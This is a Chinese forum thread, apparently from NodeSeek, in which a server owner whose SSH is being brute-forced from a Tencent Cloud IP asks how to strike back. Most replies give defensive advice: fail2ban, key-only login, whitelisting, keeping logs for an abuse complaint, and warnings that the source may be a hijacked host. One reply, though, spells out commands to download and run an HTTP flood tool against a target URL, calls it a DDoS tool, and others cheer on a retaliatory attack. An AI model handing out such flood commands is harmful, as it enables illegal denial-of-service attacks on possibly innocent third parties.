腾讯云150.158.10.225 在爆破我的前置鸡

kktt22 2026-08-12 00:37 1

怎么反击 我现在已经封禁了它ssh

最新回复 (32)
  • tafei 08-12 00:38
    1

    @kktt22 #0 向腾讯投诉

  • kktt22 楼主 08-12 00:39
    2

    @tafei #1 发布于2026-08-12 00:38:16

    @kktt22 #0 向腾讯投诉


    我想干它

  • liuts 08-12 00:39
    3

    日志下载 abuse走起

  • 朝阳群众 08-12 00:39
    4

    投诉走起

  • LangYa 08-12 00:40
    5

    沒用 你投訴這種國內沒人管 ^-^ 你只能ddos他

  • kktt22 楼主 08-12 00:40
    6

    @LangYa #5 有没有工具啊老哥 我睡不着 我干他

  • yester 08-12 00:40
    7

    支持干就完事 ^-^

  • Coremark 08-12 00:41
    8

    投诉

  • LangYa 08-12 00:41
    9

    @kktt22 #6 沒,不用反擊了,很多這種,也可能是肉雞,不知道被這樣乾了,直接弄fali2ban速率限制就行了

  • kktt22 楼主 08-12 00:42
    10

    @LangYa #9 发布于2026-08-12 00:41:31

    @kktt22 #6 沒,不用反擊了,很多這種,也可能是肉雞,不知道被這樣乾了,直接弄fali2ban速率限制就行了


  • LangYa 08-12 00:42
    11

    @kktt22 #10 讓它弄速率限制就行了

  • kktt22 楼主 08-12 00:43
    12

    @LangYa #9 发布于2026-08-12 00:41:31

    @kktt22 #6 沒,不用反擊了,很多這種,也可能是肉雞,不知道被這樣乾了,直接弄fali2ban速率限制就行了


    它在穷举我的ssh密码 但是没有多少次 有三五十次 不知道为啥 应该是批量打的吧 扫到我的号段了

  • TianTangJun 08-12 00:43
    13

    FAIL2BAN正常工作就行 ^-^ 这种我一般配置第一次3天累计就加3个月来着

  • LangYa 08-12 00:43
    14

    @kktt22 #12 自動的 不用在意 全球很多這種 掃描全球

  • kktt22 楼主 08-12 00:45
    15

    @LangYa #14 发布于2026-08-12 00:43:54

    @kktt22 #12 自動的 不用在意 全球很多這種 掃描全球


    谢谢佬

  • liuts 08-12 00:45
    16

    不建议反击 除非你不怕删鸡


    wget https://github.com/maintell/webBenchmark/releases/download/0.5/webBenchmark_linux_x64

    chmod +x webBenchmark_linux_x64

    ./webBenchmark_linux_x64 -c 32 -s https://target.url
  • kktt22 楼主 08-12 00:45
    17

    @TianTangJun #13 发布于2026-08-12 00:43:21

    FAIL2BAN正常工作就行 这种我一般配置第一次3天累计就加3个月来着


    设置了 第一次被扫

  • kktt22 楼主 08-12 00:45
    18

    @liuts #16 发布于2026-08-12 00:45:14

    不建议反击 除非你不怕删鸡


    这个是啥

  • kktt22 楼主 08-12 00:46
    19

    @liuts #16 发布于2026-08-12 00:45:14

    不建议反击 除非你不怕删鸡


    我有个小鸡面板 没有用 想ddos回去

  • TianTangJun 08-12 00:46
    20

    @kktt22 #17 我之前也有个鸡被扫,还好我一直设置的FAIL2BAN三次就封掉然后是三天,最近才上的累计 ^-^

  • 东道主 08-12 00:46
    21

    直接d他

  • liuts 08-12 00:47
    22

    @kktt22 #18 ddos工具


    https://github.com/maintell/webBenchmark/

  • liuts 08-12 00:49
    23

    @kktt22 #19 啥意思 别用公共的鸡打啊

  • barry66688 08-12 00:51
    24

    投诉走起来

  • 飞牛 08-12 00:52
    25

    也是服,ssh端口不是本应该就白名单制使用吗,爆破ssh那真的就是每毫秒都存在

  • kktt22 楼主 08-12 00:55
    26

    @飞牛 #25 发布于2026-08-12 00:52:48

    也是服,ssh端口不是本应该就白名单制使用吗,爆破ssh那真的就是每毫秒都存在


    我改善了

  • NCCK-Tony 08-12 00:56
    27

    白名单做完基本就够了。再检查下 sshd:关 PasswordAuthentication 和 PermitRootLogin,只留密钥;把 UTC 时间、源 IP、目标端口和 auth 日志留一下,要投诉就一起交。别反打,源 IP 也可能只是肉鸡,最后容易把自己机器先搞没。

  • book思议 08-12 00:57
    28

    这种一看就是哪吒受害者

  • kktt22 楼主 08-12 00:57
    29

    @NCCK-Tony #27 发布于2026-08-12 00:56:30

    白名单做完基本就够了。再检查下 sshd:关 PasswordAuthentication 和 PermitRootLogin,只留密钥;把 UTC 时间、源 IP、目标端口和 auth 日志留一下,要投诉就一起交。别反打,源 IP 也可能只是肉鸡,最后容易把自己机器先搞没。


    好的 谢谢

  • 飞牛 08-12 00:58
    30

    @kktt22 #26


    养成好习惯吧,ssh、3389这些端口改密钥+白名单,本来就不能全开,除非是没用的小鸡或者内网,你看只要是大厂,都会在面板上给防火墙设置,目的都是让你们认认真真去利用起来啊

  • kktt22 楼主 08-12 00:59
    31

    @liuts #22 发布于2026-08-12 00:47:09

    @kktt22 #18 ddos工具


    谢谢了佬 就缺这个

  • dmhy 08-12 01:24
    32

    直接写信投诉她

* 帖子来源NodeSeek
返回